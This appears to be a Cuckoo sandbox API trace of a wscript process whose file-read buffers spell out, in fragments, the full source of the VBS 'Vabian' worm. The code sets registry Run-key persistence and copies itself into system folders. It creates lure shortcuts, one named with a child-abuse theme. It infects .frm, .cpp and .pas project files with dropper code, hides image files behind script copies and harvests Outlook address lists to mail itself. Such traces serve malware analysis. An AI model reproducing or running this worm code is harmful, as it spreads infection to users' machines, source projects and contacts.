Buffer => MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => PE\x00\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => L\x01\x04\x00\x18\xa1\x02H\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x02! FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d0 FileInformation => \x10\x01\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => .text\x00\x00\x00\x83\xd5\x01\x00\x00\x10\x00\x00\x00\xe0\x01\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00` FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => .data\x00\x00\x000\x08\x00\x00\x00\xf0\x01\x00\x00\x10\x00\x00\x00\xf0\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\xc0 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => .rsrc\x00\x00\x00`~\x00\x00\x00\x00\x02\x00\x00\x80\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00@ FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d0 FileInformation => h\x02\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x02\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => \xf0\x02\x00\x800\x00\x00\x80 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d0 FileInformation => \x18\x00\x02\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => \x03\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => \xe0\x02\x00\x80H\x00\x00\x80 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d0 FileInformation => \x00\x02\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => \x07\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => T\x00Y\x00P\x00E\x00L\x00I\x00B\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,413 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d0 FileInformation => h\x02\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d0 FileInformation => X\x00\x02\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => \x01\x00\x00\x00\xf0\x00\x00\x80 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d0 FileInformation => h\x02\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => \x04\x00\x00 \x02\x00\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtSetInformationFile |
FileHandle => 0x000001d0 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => x\x06\x02\x00\xe4\\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d0 FileInformation => \x00\xa0\x02\x00\x00\x00\x00\x00\x00\xa0\x02\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtCreateSection |
ObjectAttributes => DesiredAccess => 0x000f0005 SectionHandle => 0x000001d4 FileHandle => 0x000001d0 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013d770 SectionHandle => 0x000001d4 ProcessHandle => 0xffffffff BaseAddress => 0x00f70000 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001ce |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001ca |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey |
Handle => 0x000001ba |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtCreateFile |
ShareAccess => 3 FileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\dboardman3_malware2.vbs DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => Rem VBS.W32.I-worm.Vabian
Rem Script Project Infector [pas,frm,cpp]
Rem By Psychologic aka Puppy
Rem Mailto : Psychologic@hot FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => mail.com
'sending filename
'x=msgbox(Wscript.ScriptName, 0, "Title")
'malware expires....
date2 = #06/01/2018#
date1 = FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => Date 'get current date
'x = msgBox(date1,0,"sadd")
'x1 = msgBox(date2,0,"sad1")
'x2 = msgBox(diff,0,"diff")
Do while FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => true
If date1 < date2 Then
Exit Do
End If
WScript.Sleep 1000
Loop
On error resume next
Set executor = wscript.Cr FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => eateObject("WScript.Shell")
Set fso = CreateObject("scripting.FileSystemObject")
Set drop = Fso.opentextfile(wscript.scriptful FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => lname, 1)
src = drop.readall
drop.close
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\"
executor.regwrite "HKEY_CLASSES_ROOT FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => \VXFile\DefaultIcon\","C:\PROGRA~1\INTERN~1\iexplore.exe,8"
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\ScriptEngine\","VBScrip FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => t"
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"
executor.regwrite " FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => HKEY_CLASSES_ROOT\VXFile\Shell\Open\Command\","C:\WINDOWS\WScript.exe " & chr(34) & "%1" & chr(34) & " %*"
executor.regwrite "H FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => KEY_CLASSES_ROOT\VXFile\Shell\Play\Command\","C:\WINDOWS\COMMAND\CScript.exe " & chr(34) & "%1" & chr(34) & " %*"
executor.regw FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => rite "HKEY_CLASSES_ROOT\VXFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"
executor.regwr FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => ite "HKEY_CLASSES_ROOT\.VX\","VXFile"
executor.regwrite "HKEY_CLASSES_ROOT\VX\CLSID\","{B54F3741-5B07-11cf-A4B0-00AA004A55E8}"
FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer =>
executor.regwrite "HKEY_CLASSES_ROOT\VX\OLEScript\"
fso.copyfile wscript.scriptfullname,"C:\windows\backup_vabian.sys"
fso. FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => copyfile wscript.scriptfullname,"C:\windows\Vabian.VX"
if fso.FolderExists("C:\Documents and Settings\All Users\Desktop") the FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => n
on error resume next
set shell=wscript.createobject("wscript.shell")
set msc=shell.CreateShortCut("C:\Documents and Sett FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => ings\All Users\Desktop\Sex-Vabian.jpg.lnk")
msc.TargetPath = Shell.ExpandEnvironmentStrings("%windir%\Vabian.VX")
msc.IconLo FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => cation = Shell.ExpandEnvironmentStrings("C:\windows\system32\mspaint.exe, 0")
msc.WindowStyle = 4
msc.Save
end if
if fso FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => .FolderExists("C:\windows\Desktop") then
on error resume next
set shell=wscript.createobject("wscript.shell")
set msc=shel FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => l.CreateShortCut("C:\windows\Desktop\Sex-Children.jpg.lnk")
msc.TargetPath = Shell.ExpandEnvironmentStrings("%windir%\Vabian.V FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => X")
msc.WindowStyle = 4
msc.Save
end if
set opendroperfrm = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
allsour FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => cefrm = ""
oneline = ""
do while opendroperfrm.readline <> "'VabianMarker"
oneline = opendroperfrm.readline
frmformat = FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => replace(oneline,chr(34),chr(34)&"&chr(34)&"&chr(34))
fullline = "? #1," & frmformat
allsourcefrm = allsourcefrm & vbcrlf & FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => fullline
loop
opendroperfrm.close
set opendropercpp = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
allsourcecpp = FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => ""
oneline1 = ""
do while opendropercpp.readline <> "'VabianMarker"
oneline1 = ""
oneline1 = opendropercpp.readline
oneb FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => yone = len(oneline1)
for i = 1 to onebyone
read34 = mid(oneline1,i,1)
if read34 = chr(34) then
m = ",34"
else
FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => m = ""
end if
all = all & m
next
cppformat1 = replace(oneline1,chr(34),"%c")
cppformat = replace(cppformat1,"\","\\" FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => )
fullline1 = "fprintf(mvbswe," & chr(34) & cppformat & "\n" & chr(34) & all & ");"
allsourcecpp = allsourcecpp & vbcrlf & FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => fullline1
all = ""
loop
opendropercpp.close
set opendroperpas = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
all FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => sourcepas = ""
oneline2 = ""
do while opendroperpas.readline <> "'VabianMarker"
oneline2 = ""
oneline2 = opendroperpas.rea FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => dline
fullline2 = "writeln (mvbswe,'" & oneline2 & "');"
allsourcepas = allsourcepas & vbcrlf & fullline2
loop
opendroper FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => pas.close
winfold = fso.getspecialfolder(0)
backpath = winfold & "\vabian.vbs"
executor.regwrite "HKLM\SOFTWARE\Microsoft FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => \Windows\CurrentVersion\Run\Vabian", "wscript.exe " & backpath & " %"
fso.copyfile wscript.scriptfullname, backpath
ranpay = i FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => nt(rnd * 9)+1
if ranpay > 5 then
set payload = fso.CreateTextFile("C:\payload.txt")
payload.write "VBS.Vabian" & vbcrlf & FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => "-------------" & vbcrlf
payload.write "Dear user ... " & vbcrlf & "I just want to tell you something" & vbcrlf
payload.wri FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => te "Your computer has been infected with virus,it called VBS.Vabian" & vbcrlf
payload.write "If you are an Programer, go look FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => at your project check all your frm or cpp or pas files" & vbcrlf
payload.write "Cos that is the victim" & vbcrlf & "Ok I have FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => to go now" & vbcrlf
payload.write "--------------------------------------------------" & vbcrlf
payload.write "Made by Psyc FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => hologic aka Puppy - Indonesian hip-hop singer"
payload.close
executor.run "C:\payload.txt"
end if
Set Drives=fso.drives FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer =>
For Each Drive in Drives
If drive.isready then
FindVictim drive
end If
Next
function FindVictim(path)
on error FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => resume next
Set Folder=fso.getfolder(path)
Set Files = folder.files
For Each File in files
If fso.GetExtensionName(file FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => .path)="frm" then
on error resume next
set readfrmmarker = fso.OpenTextFile(file.path,1, True)
frmmarker = readfrmmarker.r FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | NtReadFile |
Buffer => eadline
frmreadall = readfrmmarker.readall
if frmmarker <> "Rem W32.hllp.Vabian" then
set readfrmmarker = fso.CreateTex FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => tFile(file.path, True)
readfrmmarker.write "Rem W32.hllp.Vabian" & vbcrlf & frmreadall & vbcrlf
readfrmmarker.write "Pri FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => vate Sub form_unload(cancel As Integer)" & vbcrlf
readfrmmarker.write "On Error GoTo err:" & vbcrlf
readfrmmarker.write FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => "Open " & chr(34) & "C:\vabian.vbs" & chr(34) & " for output as #1" & vbcrlf
readfrmmarker.write allsourcefrm & vbcrlf & "c FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => lose #1" & vbcrlf & "shell " & chr(34) & "C:\vabian.vbs" & chr(34) & vbcrlf
readfrmmarker.write "msgbox " & chr(34) & "Your FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => Program has been infected by Vabian virus Created by Psychologic" & chr(34) & ",VbInformation," & chr(34) & "W32.VBS.Vabian" & c FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => hr(34)
readfrmmarker.write vbcrlf & "exit sub" & vbcrlf & "err:" & vbcrlf & "End sub" & vbcrlf
readfrmmarker.close
en FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => d if
end if
If fso.GetExtensionName(file.path)="cpp" then
on error resume next
set readcppmarker = fso.OpenTextFile( FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => file.path,1, True)
cppmarker = readcppmarker.readline
cppreadall = readcppmarker.readall
if mid(cppreadall,len(cppreadall FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => ),1) = "}" then
cppreadall1 = replace(cppreadall,mid(cppreadall,len(cppreadall),1),"")
end if
if cppmarker <> "// W3 FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => 2.hllp.Vabian" then
set readcppmarker = fso.CreateTextFile(file.path, True)
readcppmarker.write "// W32.hllp.Vabian" & v FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => bcrlf & "FILE *Vabian;" & vbcrlf
readcppmarker.write cppreadall & "wormvabian = fopen("&chr(34)&"vabian.vbs"&chr(34)&","&chr FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => (34)&"wt"&chr(34)&");" & vbcrlf
readcppmarker.write "if(wormvabian)"&vbcrlf&"{"& allsourcecpp &vbcrlf&"}" & vbcrlf
readc FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => ppmarker.write "ShellExecute(NULL, "&chr(34)&"open"&chr(34)&", "&chr(34)&"vabian.vbs"&chr(34)&", NULL, NULL, SW_SHOWNORMAL);" & FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => vbcrlf
readcppmarker.write "}" & vbcrlf
readcppmarker.close
end if
end if
If fso.GetExtensionName(file.path)= FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => "pas" then
on error resume next
set readpasmarker = fso.OpenTextFile(file.path,1, True)
pasmarker = readpasmarker.readline FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer =>
pasreadall = readpasmarker.readall
if pasmarker <> "{ W32.hllp.Vabian }" then
set readpasmarker = fso.CreateTextFile(f FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => ile.path, True)
readpasmarker.write "{ W32.hllp.Vabian }" & vbcrlf & pasreadall & vbcrlf
readpasmarker.write "procedure FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => " & "TForm1.FormClose(Sender: TObject; var Action: TCloseAction);" & vbcrlf
readpasmarker.write "begin" & vbcrlf & "AssignFi FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => le (Vabian,'C:\Windows\STARTM~1\programs\startup\Vabian.vbs');" & vbcrlf
readpasmarker.write "Rewrite (Vabian);" & vbcrlf & FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => allsourcepas & vbcrlf & "CloseFile(Vabian);" & vbcrlf
readpasmarker.close
end if
end if
If fso.GetExtensionName(fil FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => e.path)="bmp" or fso.GetExtensionName(file.path)="jpg" or fso.GetExtensionName(file.path)="gif" or fso.GetExtensionName(file.pat FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => h)="ico" then
For i = 1 To 8
fvar = Chr(Int(22 * Rnd) + 97)
varall = fvar & varall
Next
on error resume next
FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => bathelp = file.path & ".bat"
Set dropper = Fso.Createtextfile(bathelp, True)
dropper.writeline "Attrib +h " & file.path
FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer =>
dropper.Close
executor.run bathelp
fso.Deletefile bathelp
vbscopy = file.path & ".VX"
Set dropper2 = Fso.Createte FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => xtfile(vbscopy, True)
dropper2.write "Set " & varall & " = wscript.CreateObject(" & chr(34) & "WScript.Shell" & chr(34) & ")" FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => & vbcrlf & "Sucke.run " & chr(34) & file.path & chr(34) & vbcrlf
dropper2.write scr
dropper2.Close
end if
next
Se FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => t Subfolders = folder.SubFolders
For Each Subfolder in Subfolders
FindVictim Subfolder.path
Next
end function
Set FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => spreader =CreateObject("Outlook.Application")
Set spreader =spreader.GetNameSpace("MAPI")
For Each C In spreader.AddressLists
FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer =>
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count
Set spreader=C.AddressEntries(D)
Set spreader=spreader FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => .CreateItem(0)
spreader.To=aaaaaaaa.Address
spreader.Subject="Vabian Milenium"
spreader.Body="Stop asking,just checkout the a FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => ttachment"
spreader.Attachments.Add(Fso.GetSpecialFolder(0)&"\Vabian.vbs")
spreader.DeleteAfterSubmit=True
'//If spreader.To FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => <> "" Then
'//spreader.Send
'//End If
Next
End If
Next
'VabianMarker FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => FileHandle => 0x000001b8 |
FAILURE | 0xc0000011 | |
| 19:40:26,423 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x0000e000 BaseAddress => 0x01631000 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegOpenKeyExA |
Handle => 0x000001ba Registry => 0x80000000 SubKey => TypeLib |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegOpenKeyExW |
Handle => 0x000001c6 Registry => 0x000001ba SubKey => {F935DC20-1CF0-11D0-ADB9-00C04FD58A0B} |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegOpenKeyExA |
Handle => 0x000001ca Registry => 0x000001c6 SubKey => 1.0 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x000001ca SubKey => 409 |
FAILURE | 0x00000002 | |
| 19:40:26,423 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x000001ca SubKey => 9 |
FAILURE | 0x00000002 | |
| 19:40:26,423 | 252 | RegOpenKeyExA |
Handle => 0x000001ce Registry => 0x000001ca SubKey => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegOpenKeyExW |
Handle => 0x000001da Registry => 0x000001ce SubKey => win32 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001da |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001ce |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegOpenKeyExW |
Handle => 0x000001ce Registry => 0x000001ca SubKey => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegOpenKeyExW |
Handle => 0x000001da Registry => 0x000001ce SubKey => win32 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegQueryValueExW |
Handle => 0x000001da Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00o\x00m\x00.\x00o\x00c\x00x\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtCreateFile |
ShareAccess => 1 FileName => C:\WINDOWS\system32\wshom.ocx DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d8 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
